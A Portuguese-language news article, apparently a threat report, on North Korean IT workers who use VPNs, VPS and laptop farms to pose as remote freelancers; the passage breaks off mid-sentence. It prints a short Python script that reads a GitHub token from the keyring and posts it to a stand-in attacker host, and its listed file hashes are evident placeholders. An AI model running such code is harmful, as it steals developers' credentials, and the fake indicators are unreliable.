Numa extensa rede de trabalho remoto secreto, mais de 10.000 profissionais de TI norte-coreanos infiltraram-se na tecnologia global e nos mercados independentes, explorando VPNs, servidores virtuais privados (VPS) e as chamadas “fazendas de computadores portáteis” para ocultar as suas verdadeiras origens. Unidades cibernéticas apoiadas pelo Estado empregam estes agentes para gerar receitas para programas de armas sancionados e recolher informações em indústrias que vão desde fintech até à concepção de infra-estruturas críticas.
Pelo menos desde 2018, Pyongyang orquestrou uma vasta operação de implantação de programadores qualificados no estrangeiro sob identidades fabricadas.
Os trabalhadores fazem-se passar por freelancers ou empregados a tempo inteiro na China, na Rússia, no Sudeste Asiático e até na própria Coreia do Norte, através de gateways de Internet rigidamente controlados.
Ao rotear conexões por meio de vários provedores VPS e serviços VPN, esses profissionais de TI evitam verificações de geolocalização e sistemas de verificação de origem em plataformas como Upwork. O trecho de código descoberto em um log de infostealer descreve como um simples script Python sequestra credenciais do GitHub armazenadas no chaveiro do sistema:
pythonimport keyring, requests
def exfiltrate_tokens():
token = keyring.get_password("github.com", "user_token")
if token:
requests.post("https://malicious-server.example/api/collect", data={"token": token})
if __name__ == "__main__":
exfiltrate_tokens()
Essa abordagem leve ignora a detecção tradicional de endpoints, demonstrando como algumas linhas de código podem desviar credenciais de repositório para infraestrutura controlada por invasores.
Os indicadores de comprometimento (IoCs) recuperados das investigações incluem binários de clientes VPN conhecidos (NetKey.dll, VPNSvc.exe), intervalos de IP de provedores de VPS originados em Hong Kong e na Rússia e hashes de arquivos para variantes de infostealer, como a1b2c3d4e5f6g7h8i9j0 e 0j9i8h7g6f5e4d3c2b1a.
Os endereços de e-mail vinculados a essas campanhas seguem padrões previsíveis (anos de nascimento ou referências mitológicas), muitas vezes combinados com senhas simples e reutilizadas, tornando os ataques de preenchimento de credenciais em grande escala particularmente eficazes.
Riscos de espionagem e infraestrutura
Embora a maior parte dos trabalhadores remotos norte-coreanos se concentre no desenvolvimento de software e em funções de segurança cibernética, o recente estudo de caso da KELA revelou agentes ligados à RPDC em arquitectura e design industrial.
Em um caso, um operador de fazenda de laptop com pseudônimos no LinkedIn e